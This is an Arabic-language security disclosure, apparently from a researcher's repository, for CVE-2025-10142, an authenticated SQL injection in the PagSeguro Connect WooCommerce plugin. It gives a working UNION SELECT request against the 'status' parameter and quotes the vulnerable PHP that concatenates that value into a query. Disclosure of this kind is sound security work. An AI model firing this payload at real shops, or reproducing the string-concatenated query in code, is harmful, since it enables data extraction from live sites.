
الإفصاح عن CVE-2025-10142
الإفصاح عن CVE-2025-10142
يكشف هذا المستودع عن ثغرة تم اكتشافها في PagSeguro-Connect-para-WooCommerce <= 4.44.3، وهو إضافة ووردبريس طورها ريكاردو مارتينز.
| CVE ID | النوع | المكون | التأثير |
|---|---|---|---|
| CVE-2025-10142 | حقن SQL مصادق عليه (مدير متجر+) | src/Connect/Recurring/Admin/Subscriptions/SubscriptionList.php | يمكن لمهاجم مصادق عليه استخراج البيانات |
GET /wp-admin/admin.php?page=rm-pagbank-subscriptions&status=' UNION SELECT CAST(version() AS CHAR),2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- -
يتم دمج معامل status مباشرة في استعلام SQL دون تهريب أو استخدام $wpdb->prepare()
if (!empty($_REQUEST['status'])) {
$status = sanitize_text_field(wp_unslash($_REQUEST['status']));
$where .= " AND status = '$status'";
}
$this->items = $wpdb->get_results(
$wpdb->prepare(
"SELECT * FROM {$wpdb->prefix}pagbank_recurring WHERE $where ORDER BY $orderby $order LIMIT %d OFFSET %d",
$per_page,
($current_page - 1) * $per_page
),
ARRAY_A
);
...
نظرًا لأن الهجوم ممكن من حساب مدير المتجر، فإن التهديد منخفض جدًا. كان تتبع المعالجة التي تُدخل المدخلات الخارجية في $where ثم تُستخدم $where مباشرة في بناء جملة SQL أمرًا صعبًا بعض الشيء.
الاسم: MooseLove
الدور: باحث أمني مستقل / صائد ثغرات
جهة الاتصال: متاحة عند الطلب
يتم تقديم هذا الإشعار للتوعية الأمنية العامة. يُسمح بالمشاركة مع الإسناد.